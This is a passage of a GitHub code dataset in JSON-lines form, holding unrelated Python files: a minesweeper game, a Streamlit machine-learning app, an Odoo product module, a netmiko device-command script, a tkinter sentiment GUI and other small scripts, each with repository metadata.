mineCount = int(input('Please enter number of mines: '))\n        if mineCount <= 0 or mineCount >= rowCount * colCount:\n            mineCount = int(input('Please enter number of mines: '))\n    except:\n        print('Error reading input')\n        return\n    # initialize game state\n    board = Board(rowCount, colCount, mineCount)\n    print(board)\n    while board.gameOver == False:\n        r = int(input('Pick a row: '))\n        c = int(input('Pick a column: '))\n        board.chooseSpace(r, c)\n        if board.gameOver:\n            break\n        print(board)\n        print('\\n')\n    \n    print(board)\n    if board.gameWon:\n        print('Congratulations! You have won.')\n    else:\n        print('KABOOM. Good luck next time.')\n    try:\n        playAgain = int(input('Enter 1 to play again: '))\n        if playAgain == 1:\n            playGame()\n    except:\n        return\n\n\nplayGame()","repo_name":"bevvvvv/ExploringData","sub_path":"TriplebytePractice/minesweeperSepich.py","file_name":"minesweeperSepich.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"37943548342","text":"from scipy import rand\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn import model_selection\r\nfrom sklearn import linear_model\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, max_error, r2_score \r\n\r\ndef reg(**kwargs):\r\n    return linear_model.LinearRegression()\r\ndef tree(**kwargs):\r\n    return DecisionTreeRegressor(max_depth=kwargs['depth'], min_samples_split=kwargs['split'], min_samples_leaf=kwargs['leafs'], random_state=kwargs['random'])\r\ndef forest(**kwargs):\r\n    return RandomForestRegressor(n_estimators=kwargs['estimators'], max_depth=kwargs['depth'], min_samples_split=kwargs['split'], min_samples_leaf=kwargs['leafs'], random_state=kwargs['random'])\r\n\r\ndef log(**kwargs):\r\n    return linear_model.LogisticRegression()\r\ndef treec(**kwargs):\r\n    return DecisionTreeClassifier()\r\ndef forec(**kwargs):\r\n    return RandomForestClassifier()\r\n\r\ndef pronostico():\r\n    st.title(\"Predicción.\")\r\n    st.sidebar.subheader('Información de sección.')\r\n    st.sidebar.write('El proceso de predicción consta de utilizar los datos para que el algoritmo entrene y posteriormente'+\r\n    ' sea capaz de extrapolar datos. 
De estos algoritmos tenemos regresión lineal, arboles y bosques de los cuales solo'+\r\n ' regresion lineal no necesita ningún parametro a ser establecido')\r\n st.sidebar.write('Debido a lo anterior, cuando se calcula arboles o bosque es necesario dar click en el boton \"continuar\" para '+\r\n 'que se desplieguen las opciones necesarias y posteriormente predecir, en el caso de la regresion se puede predecir directamente.')\r\n st.sidebar.write('De no poder hacer una predicción, revisa los datos y retira las variables categóricas.')\r\n st.session_state.aux= 'aux'\r\n model_dict={'Regresión lineal':reg,'Arboles':tree,'Bosque':forest}\r\n data=st.session_state.data[st.session_state.sp]\r\n est=''\r\n d=''\r\n split=''\r\n leafs=''\r\n with st.container():\r\n with st.form('Modelo de predicción.'):\r\n predict_type=st.radio('Modelo de predicción.',['Regresión lineal','Arboles','Bosque'])\r\n sb=st.form_submit_button('Continuar')\r\n with st.form('Opciones de predicción.'):\r\n dependant_var=st.selectbox('Seleccionar variable a ser predicha.',data.columns)\r\n st.dataframe(data[dependant_var])\r\n if predict_type=='Arboles':\r\n d=st.number_input('Profundidad maxima',2)\r\n split=st.number_input('Cantidad mínima para hacer split',2)\r\n leafs=st.number_input('Cantidad minima de hojas',1)\r\n elif predict_type=='Bosque':\r\n est=st.number_input('Número de estimadores',1)\r\n d=st.number_input('Profundidad maxima',2)\r\n split=st.number_input('Cantidad mínima para hacer split',2)\r\n leafs=st.number_input('Cantidad minima de hojas',1)\r\n sb=st.form_submit_button('Predecir')\r\n try:\r\n if sb:\r\n independant_var=data.columns.drop(dependant_var)\r\n X= np.array(data[independant_var])\r\n Y= np.array(data[dependant_var])\r\n x_train,x_test,y_train,y_test= model_selection.train_test_split(X,Y,test_size=0.2,random_state=1234,shuffle=True)\r\n prediccion=model_dict[predict_type](estimators=est,depth=d,split=split,leafs=leafs,random=1234)\r\n prediccion.fit(x_train,y_train)\r\n Yp=prediccion.predict(x_test)\r\n plt.plot(y_test,color='green',marker='o',label='Datos de prueba')\r\n plt.plot(Yp,color='red',marker='o',label='Datos de calculados')\r\n fig=plt.plot()\r\n st.pyplot(fig)\r\n if predict_type=='Regresión lineal':\r\n st.write('Coeficientes: '+str(prediccion.coef_))\r\n st.write('Intercepto: '+str(prediccion.intercept_))\r\n st.write('Residuo: '+str(max_error(y_test,Yp)))\r\n st.write('MSE: '+str(mean_squared_error(y_test,Yp)))\r\n st.write('RMSE: '+str(mean_squared_error(y_test,Yp,squared=False)))\r\n st.write('Score: '+str(r2_score(y_test,Yp)))\r\n else:\r\n st.write('Criterio: '+str(prediccion.criterion))\r\n st.dataframe(pd.DataFrame({'Variable':list(data[independant_var]),'Peso':prediccion.feature_importances_}).sort_values('Peso',ascending=False))\r\n st.write('MAE: '+str(mean_absolute_error(y_test,Yp)))\r\n st.write('MSE: '+str(mean_squared_error(y_test,Yp)))\r\n st.write('RMSE: '+str(mean_squared_error(y_test,Yp,squared=False)))\r\n st.write('Score: '+str(r2_score(y_test,Yp)))\r\n except:\r\n st.subheader('Existe una variable que impide el proceso de predicción. 
Revisa los datos.')\r\n \r\n \r\n\r\n\r\ndef clasificacion():\r\n st.title(\"Clasificación.\")\r\n st.sidebar.subheader('Información de sección.')\r\n st.sidebar.write('El proceso de clasificación es muy similar al de predicción pero hay unos puntos importantes a tomar en cuenta.')\r\n st.sidebar.write('La clasificación por arboles y bosque es posible realizarla por variables categóricas pero la de regresión logística no'+\r\n ' es necesario tener valores binarios en la variable que se va a clasificar.')\r\n st.session_state.aux= 'aux'\r\n model_dict={'Regresión logística':log,'Arboles':treec,'Bosque':forec}\r\n data=st.session_state.data[st.session_state.sp]\r\n est=''\r\n d=''\r\n split=''\r\n leafs=''\r\n with st.container():\r\n with st.form('Modelo de predicción.'):\r\n predict_type=st.radio('Modelo de predicción',['Regresión logística','Arboles','Bosque'])\r\n sb=st.form_submit_button('Continuar')\r\n with st.form('Opciones de predicción.'):\r\n dependant_var=st.selectbox('Seleccionar variable a ser predicha.',data.columns)\r\n st.dataframe(data[dependant_var])\r\n if predict_type=='Arboles':\r\n d=st.number_input('Profundidad maxima',2)\r\n split=st.number_input('Cantidad mínima para hacer split',2)\r\n leafs=st.number_input('Cantidad minima de hojas',1)\r\n elif predict_type=='Bosque':\r\n est=st.number_input('Número de estimadores',1)\r\n d=st.number_input('Profundidad maxima',2)\r\n split=st.number_input('Cantidad mínima para hacer split',2)\r\n leafs=st.number_input('Cantidad minima de hojas',1)\r\n sb=st.form_submit_button('Clasificar')\r\n if sb:\r\n independant_var=data.columns.drop(dependant_var)\r\n X= np.array(data[independant_var])\r\n Y= np.array(data[dependant_var])\r\n x_train,x_validation,y_train,y_validation= model_selection.train_test_split(X,Y,test_size=0.2,random_state=1234,shuffle=True)\r\n clasificador=model_dict[predict_type](estimators=est,depth=d,split=split,leafs=leafs,random=1234)\r\n clasificador.fit(x_train,y_train)\r\n Yp=clasificador.predict(x_validation)\r\n st.text('Matriz de confusión: ')\r\n st.dataframe(pd.crosstab(y_validation.ravel(),Yp,rownames=['Real'],colnames=['Clasificación']))\r\n if predict_type=='Regresión logística':\r\n st.write('Exactitud: '+str(clasificador.score(x_validation,y_validation)))\r\n st.write('Información general:')\r\n st.dataframe(pd.DataFrame(classification_report(y_validation,Yp,output_dict=True)).transpose())\r\n st.write('Intercepción: '+str(clasificador.intercept_))\r\n st.write('Coeficientes: '+str(clasificador.coef_))\r\n else:\r\n st.write('Criterio: '+str(clasificador.criterion))\r\n st.write('Exactitud: '+str(clasificador.score(x_validation,y_validation)))\r\n st.write('Información general:')\r\n st.dataframe(pd.DataFrame(classification_report(y_validation,Yp,output_dict=True)).transpose())\r\n st.dataframe(pd.DataFrame({'Variable':list(data[independant_var]),'Peso':clasificador.feature_importances_}).sort_values('Peso',ascending=False))","repo_name":"GombVF/Mineria","sub_path":"procla.py","file_name":"procla.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71071578028","text":"# We'll use the `requests` module to make our HTTP Request \nimport requests\n\n# We'll use the `json` module to format our response's data\nimport json\n\n# First, we define our base URL and our parameters\n# Our parameters can be a Dictionary, since the `requests` module converts them\nendpoint = 
'https://en.wikipedia.org/w/api.php'\nparameters = {\n 'format': 'json',\n 'action': 'query',\n 'redirects': 1,\n 'prop': 'extracts',\n 'exintro': 1,\n 'explaintext': 1,\n 'titles': 'tjhsst'\n}\n\n# Now, we're able to fire the configured HTTP GET request\nresponse = requests.get(endpoint, params=parameters)\n\n# Next, we convert the response to a JSON with `json.loads()`\npages = json.loads(response.text)['query']['pages']\n\n# Finally, we pick out the data we want and print it to the console\n# Use Postman to figure out what format your data is in and access it accordingly\nfor key in pages.keys():\n print('Full Title: ' + pages[key]['title'])\n print('')\n introduction = pages[key]['extract'].replace('\\n', ' ')\n print('Introduction: ' + introduction)\n print('')\n ","repo_name":"QuorumUS/hacktj-examples","sub_path":"python/wikipedia_get_request.py","file_name":"wikipedia_get_request.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3716034232","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Question 2 (10’)\n# \n# Given a binary tree, find the max depth of it. Modify the “solution” function in the question2.py\n# (Analyze your time complexity, and only time-complexity optimized solution gets full grade)\n\n# In[40]:\n\n\n# Bartley Cai\nclass TreeNode(object):\n \"\"\" Definition of a binary tree node.\"\"\"\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\ndef solution(root):\n# this checks the depth of a tree from the specified node\n# any parent nodes are not considered\n# therefore, to obtain max depth, the \"ancestor\" node must be known\n if root is None: \n return 0\n else:\n # check each subtree depth\n # recursion\n right_depth = solution(root.right)\n left_depth = solution(root.left)\n # recursion indicates O(n) complexity\n if right_depth > left_depth:\n return right_depth+1\n else:\n return left_depth+1\n\n #return depth\n\na15=TreeNode(15)\na7=TreeNode(7)\na20=TreeNode(20)\na9=TreeNode(9)\na3=TreeNode(3)\na20.left=a15\na20.right=a7\na3.left=a9\na3.right=a20\nprint(solution(a3))\n\n","repo_name":"6900HS/AuE8930","sub_path":"Homework 3/Question 2.py","file_name":"Question 2.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10209223316","text":"df = pd.read_table('RSV-Virus-Normalized')\nL = []\nS = []\nfor i in range(0,16,2):\n L.append(df.Normalized[i] + df.Normalized[i+1])\n sn = df.Sample[i].split('-')[0]\n if sn == 'HRSV0h':\n S.append('Mock')\n else:\n S.append(sn[1:])\n \n \ndf = pd.DataFrame(L,index=S)\ndf.ix[:,0] = np.log2(df.ix[:,0])\ndf.ix[0,0]=0\n\nfig = plt.figure()\nax = fig.add_axes([0.1,0.15,0.85,0.8])\nax = df.plot(kind='bar', ax=ax, legend=False)\nax.set_xticklabels(S, rotation=45)\nax.set_ylabel('Normalized number of virus reads (log2)')\nplt.savefig('RSV-Virus-Normalized.pdf')\n","repo_name":"chw333/StanfordSGTC","sub_path":"NMDvirus/04-virus/RSV/06-VirusNumbr-barplot.py","file_name":"06-VirusNumbr-barplot.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19644438664","text":"from typing import List\nimport src.parser as parsers\nfrom src.syntax.conditions import Condition\nfrom src.syntax import Scope\n\n\nclass IfCondition(Scope):\n def __init__(self, condition_tokens: List[str], body_tokens: List[str], 
super_scope: Scope=None):\n super().__init__()\n self.parent = super_scope\n self.__condition_tokens = condition_tokens\n self.__body_tokens = body_tokens\n # Trims trailing whitespace\n if self.__body_tokens[len(self.__body_tokens) - 1] == \"\\n\":\n del self.__body_tokens[len(self.__body_tokens) - 1]\n self.condition = Condition(self.__condition_tokens, self.parent)\n self.__parse()\n\n def __parse(self):\n newlines = self.__find_newlines(0, len(self.__body_tokens))\n parser = parsers.Parser(self.__body_tokens)\n for i, newline in enumerate(newlines):\n token = self.__body_tokens[newline + 1]\n # Parse if and else bodies separately if there's an else present\n if token == \"else\":\n main_body = self.__body_tokens[0:newlines[i]]\n main_parser = parsers.Parser(main_body, scope=self)\n sub = self.__body_tokens[newlines[i + 1]: len(self.__body_tokens)]\n sub_parser = parsers.Parser(sub, scope=self)\n self.main_commands = main_parser.parse()\n self.else_commands = sub_parser.parse()\n return\n\n # If there's no else, parse the entire body as one\n self.main_commands = parser.parse()\n return\n\n # Finds all newlines in the token array\n def __find_newlines(self, start, end):\n # Adds the beginning index to the array so parsing starts at the beginning\n # token instead of the first newline\n newlines = [start - 1] + [i for i, j in enumerate(self.__body_tokens) if j == \"\\n\"]\n newlines = [i for i in newlines if (start - 1) <= i < end]\n return newlines\n\n def toPython(self):\n tab = \" \"\n newline = f\"\\n{tab*self.parentCount()}\"\n else_newline = f\"\\n{tab*(self.parentCount()-1)}\"\n string = f\"\"\"if {self.condition.toPython()}:{newline}{newline.join([command.toPython() for command in self.main_commands])}\"\"\"\n if self.else_commands is not None:\n elseString = f\"\"\"{else_newline}else:{newline}{newline.join([command.toPython() for command in self.else_commands])}\"\"\"\n string += elseString\n return string\n","repo_name":"Sherif-Abdou/ezpy","sub_path":"src/syntax/conditions/if_condition.py","file_name":"if_condition.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4795713989","text":"#!/usr/bin/python\n# -*- coding: iso-8859-1 -*-\n\nimport emotionPredictor as ep\nimport tkinter as Tkinter\n\nclass simpleapp_tk(Tkinter.Tk):\n def __init__(self,parent):\n Tkinter.Tk.__init__(self,parent)\n self.parent = parent\n self.initialize()\n\n def initialize(self):\n self.grid()\n\n self.entryVariable = Tkinter.StringVar()\n self.entry = Tkinter.Entry(self,textvariable=self.entryVariable)\n self.entry.grid(column=0,row=0,sticky='EW')\n self.entry.bind(\"\", self.OnPressEnter)\n self.entryVariable.set(u\"Enter text here.\")\n\n button = Tkinter.Button(self,text=u\"Click me !\",\n command=self.OnButtonClick)\n button.grid(column=1,row=0)\n\n self.labelVariable = Tkinter.StringVar()\n\n self.label = Tkinter.Label(self,textvariable=self.labelVariable,\n anchor=\"w\",fg=\"white\",bg=\"blue\")\n\n self.label.grid(column=0,row=1,columnspan=2,sticky='EW')\n\n self.labelVariable.set(u\"Hello !\")\n\n self.grid_columnconfigure(0,weight=1)\n self.resizable(True,False)\n self.update()\n self.geometry(self.geometry()) \n self.entry.focus_set()\n self.entry.selection_range(0, Tkinter.END)\n\n def OnButtonClick(self):\n\n self.labelVariable.set( self.evaluate())\n self.entry.focus_set()\n self.entry.selection_range(0, Tkinter.END)\n\n def OnPressEnter(self,event):\n\n self.labelVariable.set( 
self.evaluate() )\n self.entry.focus_set()\n self.entry.selection_range(0, Tkinter.END)\n\n def evaluate(self):\n inputText = self.entryVariable.get()\n outputText = ep.emotionPredictor(inputText)\n if outputText==\"neg\":\n finalText = \"Negative :(\"\n self.label.configure(bg=\"red\")\n else:\n finalText = \"Positive :)\"\n self.label.configure(bg=\"blue\")\n return finalText\n\nif __name__ == \"__main__\":\n app = simpleapp_tk(None)\n app.title('Emotion Detector')\n app.mainloop()","repo_name":"papaniivanderpuye/Public-Projects","sub_path":"Emotion Predictor Project (Machine Learning, Python)/guiForProject.py","file_name":"guiForProject.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21222624006","text":"import itertools\nimport logging\nimport base64\n\nfrom odoo import api, fields, models, tools, _, SUPERUSER_ID\nfrom odoo.exceptions import ValidationError, RedirectWarning, UserError\n\n_logger = logging.getLogger(__name__)\n\n\nclass ProductTemplate(models.Model):\n _inherit = \"product.template\"\n\n\n mrp_product_qty = fields.Float('Manufactured',digits='New Cortex Precision',\n compute='_compute_mrp_product_qty', compute_sudo=False)\n drawing_no = fields.Char('Drawing #', track_visibility='onchange')\n default_code = fields.Char(\n 'Part Number', compute='_compute_default_code',\n inverse='_set_default_code', store=True)\n drawing_version = fields.Selection([('a', 'A'), ('b', 'B'), ('c', 'C'), ('d', 'D'), ('e', 'E'), ('f', 'F'), ('g', 'G'), ('h', 'H')], string='Drawing Version')\n drawing_pdf = fields.Binary(string='Drawing pdf')\n file_name = fields.Char(string='FileName')\n sales_count = fields.Float(compute='_compute_sales_count', string='Sold', digits='New Cortex Precision')\n purchased_product_qty = fields.Float(compute='_compute_purchased_product_qty', string='Purchased',digits='New Cortex Precision')\n length = fields.Float(string=\"Length\",compute='_compute_length', inverse='_set_length',store=True)\n running_avg_cost = fields.Float(string=\"Running AVG. 
cost\",compute='_compute_running_avg_cost',digits='New Cortex Precision')\n machine_parts_count = fields.Integer(string='Machine Part', compute='_compute_installed_parts_ids')\n installed_parts_count = fields.Integer(string='Installed Part', compute='_compute_installed_parts_ids')\n vendor_product_code_store = fields.Char(string=\"Store Vendor Code\",compute=\"compute_store_vendor_code\",store=True)\n drawing_number = fields.Char(string='Drawing #', compute='_compute_drawing_number', store=True)\n service_products = fields.Many2many('product.product', string='Service Products')\n cornomics_detail_ids = fields.One2many('cornomics.company.detail', 'product_tmpl_id',\n string='Cornomics Detail Line')\n active = fields.Boolean('Active', default=True, tracking=True,\n help=\"If unchecked, it will allow you to hide the product without removing it.\")\n installed_quantity = fields.Float(string=\"Installed Quantity\",compute=\"_compute_installed_parts_ids\",digits='New Cortex Precision' )\n minimum_stock = fields.Integer('Minimum Stock',default=50)\n unit_or_per = fields.Selection([('per','%'),('unit','Unit')],default='per')\n product_with_vendor_ids = fields.One2many('product.with.vendor','product_template_id', string=\"Manufacturing Order\") \n list_of_attachment = fields.One2many('drawing.files','template_id',string=\"List of Attachment\")\n\n @api.onchange('drawing_no', 'drawing_version')\n def onchange_drawing_no(self):\n # If the drawing no is not exist then no need for drawing version so removed value of it\n if not self.drawing_no and self.drawing_version:\n self.drawing_version = ''\n\n @api.depends('drawing_no', 'drawing_version')\n def _compute_drawing_number(self):\n for record in self:\n drawing_number = record.drawing_no\n if record.drawing_version and drawing_number:\n drawing_number = drawing_number + ' - ' + (record.drawing_version).upper()\n record.drawing_number = drawing_number\n\n @api.depends('seller_ids.product_code')\n def compute_store_vendor_code(self):\n for record in self:\n total_product_code =''\n for line in record.seller_ids:\n if line.product_code:\n if total_product_code:\n total_product_code += ',' + line.product_code\n else:\n total_product_code = line.product_code\n record.vendor_product_code_store = total_product_code\n\n @api.depends('product_variant_id')\n def _compute_installed_parts_ids(self):\n for product in self:\n machine_parts = self.env['installed.part'].search([('installed_part_detail_id.product_id', 'in', product.product_variant_id.ids)])\n installed_parts = self.env['installed.part.detail'].search(\n [('product_id', 'in', product.product_variant_id.ids)])\n\n total=0\n for record in installed_parts:\n total += record.installed_knife\n\n product.installed_quantity = total\n product.machine_parts_count = len(machine_parts)\n product.installed_parts_count = len(installed_parts)\n\n\n def action_view_machine_parts(self):\n return {\n 'name': _('Machine Center'),\n 'res_model': 'installed.part',\n 'type': 'ir.actions.act_window',\n 'view_mode': 'list,form',\n 'domain': [('installed_part_detail_id.product_id', 'in', self.product_variant_id.ids)],\n 'context': {'default_partner_id':self.id}\n }\n\n def action_view_installed_parts(self):\n return {\n 'name': _('Installed Part'),\n 'res_model': 'installed.part.detail',\n 'type': 'ir.actions.act_window',\n 'view_mode': 'list,form',\n 'domain': [('product_id', 'in', self.product_variant_id.ids)],\n 'context': {'search_default_filter_frequency': 1}\n }\n\n def _compute_running_avg_cost(self):\n 
stock_valuation = self.env['stock.valuation.layer']\n        fields = ['product_id', 'quantity', 'value']\n        groupby = ['product_id']\n        for records in self:\n            domain = [('product_id.product_tmpl_id','=',records.id)]\n            inventory_value = stock_valuation.read_group(domain, fields, groupby)\n            if inventory_value:\n                if inventory_value[0].get('quantity') > 0:\n                    records.running_avg_cost = inventory_value[0].get('value') / inventory_value[0].get('quantity')\n                else:\n                    records.running_avg_cost = 0.0\n            else:\n                records.running_avg_cost = 0.0\n\n    @api.depends('product_variant_ids', 'product_variant_ids.length')\n    def _compute_length(self):\n        unique_variants = self.filtered(lambda template: len(template.product_variant_ids) == 1)\n        for template in unique_variants:\n            template.length = template.product_variant_ids.length\n        for template in (self - unique_variants):\n            template.length = 0.0\n\n    def _set_length(self):\n        for template in self:\n            if len(template.product_variant_ids) == 1:\n                template.product_variant_ids.length = template.length\n\n    # Send mail when an installed part's stock falls below its minimum stock level\n    def cron_alert_installed_part(self):\n        product_data = self.search_read([], ['default_code', 'name', 'installed_quantity', 'qty_available','minimum_stock','unit_or_per','product_variant_id'])\n        IrConfigParameter = self.env['ir.config_parameter'].sudo().get_param('cortex_na.product_related_hq_location', 'False')\n        location = int(IrConfigParameter)\n        fields = ['product_id', 'quantity']\n        groupby = ['product_id']\n        domain = [('location_id','=',location),('quantity','>',0)]\n        inventory_value = self.env['stock.quant'].read_group(domain, fields, groupby)\n        product_dict = {}\n        for obj in inventory_value:\n            product_dict.update({obj.get('product_id')[0]:obj.get('quantity')})\n\n        product_list = []\n        for record in product_data:\n            installed_quantity = record.get('installed_quantity')\n            minimum_stock = record.get('minimum_stock')\n            unit_or_per = record.get('unit_or_per')\n            # 'per' treats minimum_stock as a percentage of the installed quantity\n            if unit_or_per == 'per':\n                ratio = (installed_quantity * minimum_stock) / 100\n            else:\n                ratio = minimum_stock\n\n            on_hand = record.get('qty_available') or 0\n            if on_hand < ratio:\n                record['hq'] = product_dict.get(record.get('product_variant_id')[0]) or 0\n                record['other_location'] = record.get('qty_available') - record.get('hq')\n                product_list.append(record)\n\n        template_id = self.env.ref('cortex_na.email_template_alert_installed_part')\n        user_ids = self.env.user\n        if product_list:\n            attachment_id = self.action_generate_attachment(product_list)\n            if attachment_id:\n                template_id.attachment_ids = [(6, 0, attachment_id.ids)]\n                msg = \"Please find attached a report of the parts that are below the minimum stock level.\"\n            else:\n                template_id.attachment_ids = None\n                msg = \"There are no parts below the minimum stock level.\"\n        else:\n            template_id.attachment_ids = None\n            msg = \"There are no parts below the minimum stock level.\"\n        template_id.with_context(msg=msg).send_mail(user_ids.id, force_send=True)\n        _logger.info(\"Successfully sent mail for Installed Part Stock Report.\")\n\n    def action_generate_attachment(self, product_list):\n        \"\"\" This method is called from a button action in the view XML. \"\"\"\n        # generate pdf from report, use report's id as reference\n        pdf = self.env.ref('cortex_na.alert_installed_part_report').with_context(data=product_list).render_qweb_pdf()\n        # pdf result is a list\n        b64_pdf = base64.b64encode(pdf[0])\n        # save pdf as attachment\n        attachment_name = \"Installed Part Stock Report\"\n        if b64_pdf:\n            return 
self.env['ir.attachment'].create({\n 'name': attachment_name,\n 'type': 'binary',\n 'datas': b64_pdf,\n 'res_model': self._name,\n 'res_id': self.id,\n 'mimetype': 'application/pdf'\n })\n else:\n return False\n\n def duplicate_with_bom(self):\n self.ensure_one()\n new_product = self.copy()\n\n current_attributes_vals = {}\n for tmpl_attr in self.valid_product_template_attribute_line_ids._without_no_variant_attributes().product_template_value_ids._only_active():\n current_attributes_vals[tmpl_attr.id] = (tmpl_attr.attribute_id.id, tmpl_attr.name)\n new_attributes_vals_r = {}\n for tmpl_attr in new_product.valid_product_template_attribute_line_ids._without_no_variant_attributes().product_template_value_ids._only_active():\n new_attributes_vals_r[(tmpl_attr.attribute_id.id, tmpl_attr.name)] = tmpl_attr.id\n\n new_variants_attrs_r = {}\n for product in new_product.product_variant_ids:\n new_variants_attrs_r[tuple(product.product_template_attribute_value_ids.ids)] = product.id\n\n existing_bom = self.env['mrp.bom'].search([('product_tmpl_id', '=', self.id)])\n if existing_bom:\n for e_bom in existing_bom:\n new_bom_data = {\n 'product_tmpl_id': new_product.id\n }\n new_bom_p_id = None\n if e_bom.product_id:\n e_product_attrs_ids = e_bom.product_id.product_template_attribute_value_ids.ids\n if e_product_attrs_ids:\n n_product_attrs_ids = []\n for attr_id in e_product_attrs_ids:\n attr_val = current_attributes_vals[attr_id]\n if new_attributes_vals_r.get(attr_val):\n n_product_attrs_ids.append(new_attributes_vals_r[attr_val])\n if new_variants_attrs_r.get(tuple(n_product_attrs_ids)):\n new_bom_p_id = new_variants_attrs_r[tuple(n_product_attrs_ids)]\n else:\n new_bom_p_id = new_product.product_variant_id.id\n if new_bom_p_id:\n new_bom_data['product_id'] = new_bom_p_id\n\n bom_vals = e_bom.with_context(active_test=False).copy_data(new_bom_data)[0]\n for bom_line in bom_vals.get('bom_line_ids') or []:\n if len(bom_line) == 3:\n line_data = bom_line[2]\n if line_data.get('bom_product_template_attribute_value_ids'):\n line_attr = line_data['bom_product_template_attribute_value_ids']\n if len(line_attr[0]) == 3 and line_attr[0][2]:\n new_attr_ids = []\n for line_attr_id in line_attr[0][2]:\n line_attr_val = current_attributes_vals[line_attr_id]\n if new_attributes_vals_r.get(line_attr_val):\n new_attr_ids.append(new_attributes_vals_r[line_attr_val])\n line_attr_list_data = list(line_attr[0])\n line_attr_list_data[2] = new_attr_ids\n line_attr[0] = tuple(line_attr_list_data)\n e_bom.copy(bom_vals)\n if new_product:\n action = {\n 'type': 'ir.actions.act_window',\n 'res_model': self._name,\n 'view_type': 'form',\n 'view_mode': 'form',\n 'target': 'current',\n 'res_id': new_product.id,\n 'context': dict(self._context),\n }\n else:\n raise UserError(_('Something went wrong.'))\n return action\n\n\nclass ProductWithVendor(models.Model):\n _name = \"product.with.vendor\"\n \n product_template_id = fields.Many2one('product.template', string=\"Product\")\n bom_id = fields.Many2one('mrp.bom',string='Bill of Material', domain = \"[('product_tmpl_id','=',parent.id),('type', '=', 'normal')]\", required=\"True\")\n partner_id = fields.Many2one('res.partner',string='Vendor', required=\"True\")\n company_id = fields.Many2one(\n 'res.company', 'Company', default=lambda self: self.env.company, index=True, 
required=True)\n","repo_name":"Cortex4103/Cortex2","sub_path":"cortex_na/models/product_template.py","file_name":"product_template.py","file_ext":"py","file_size_in_byte":14053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40946616077","text":"import time\nimport logging\nfrom concurrent.futures import ThreadPoolExecutor\nfrom itertools import repeat\n\nfrom netmiko import ConnectHandler\nfrom netmiko.ssh_exception import SSHException\n\n# Logging configuration\nlog = logging.getLogger(__name__)\nlog.addHandler(logging.NullHandler())\n\n\ndef send_show(device_dict, command):\n ip = device_dict[\"host\"]\n log.info(f\"===> Connection: {ip}\")\n\n try:\n with ConnectHandler(**device_dict) as ssh:\n ssh.enable()\n result = ssh.send_command(command)\n log.debug(f\"<=== Received: {ip}\")\n log.debug(f\"Получен вывод команды {command}\\n\\n{result}\")\n return result\n except SSHException as error:\n #log.exception(f\"Ошибка {error} на {ip}\")\n log.error(f\"Ошибка {error} на {ip}\")\n\n\ndef send_command_to_devices(devices, command):\n log.debug(\"START\")\n data = {}\n with ThreadPoolExecutor(max_workers=2) as executor:\n result = executor.map(send_show, devices, repeat(command))\n for device, output in zip(devices, result):\n data[device[\"host\"]] = output\n return data\n","repo_name":"natenka/advpyneng-examples-exercises","sub_path":"examples/05_logging/null_handler/base_functions.py","file_name":"base_functions.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"7943439071","text":"#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport subprocess\n\n# Тест работы скрипта\nif __name__ == \"__main__\":\n # import nltk\n # nltk.download('wordnet')\n\n # Список модулей для установки\n modules = [\n \"pip install nltk\",\n \"pip install spacy\",\n \"spacy download en\",\n \"pip install pymorphy2\",\n \"pip install -U pymorphy2-dicts-ru\",\n \"pip install pymystem3\"\n ]\n\n # Переходим по всему списку модулей\n for module in modules:\n # Изменяем модуль\n module = \"%s -m %s\" % (sys.executable, module)\n\n # Выполняем установку приложения\n p = subprocess.Popen(module.split(\" \"))\n try:\n # Ожидаем выполнение процесса\n p.wait(timeout=3000)\n # Если произошел таймаут\n except subprocess.TimeoutExpired:\n # Останавливаем процесс\n p.terminate()\n # Выводим сообщение о таймауте\n print(\"Stop install module: [%s]\" % module)\n","repo_name":"anyks/asc","sub_path":"scripts/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"ru","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"32654599457","text":"from .Parsing import ParsingBase\nfrom .Parsing.handle_images import handle_img_combo\nfrom ..rss_class import Rss\n\n\n# 处理图片\n@ParsingBase.append_handler(\n parsing_type=\"picture\",\n rex=r\"https:\\/\\/www\\.youtube\\.com\\/feeds\\/videos\\.xml\\?channel_id=\",\n)\nasync def handle_picture(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n\n # 判断是否开启了只推送标题\n if rss.only_title:\n return \"\"\n\n img_url = item.get(\"media_thumbnail\")[0].get(\"url\")\n res = await handle_img_combo(img_url, rss.img_proxy)\n\n # 判断是否开启了只推送图片\n if rss.only_pic:\n return f\"{res}\\n\"\n\n return f\"{tmp + 
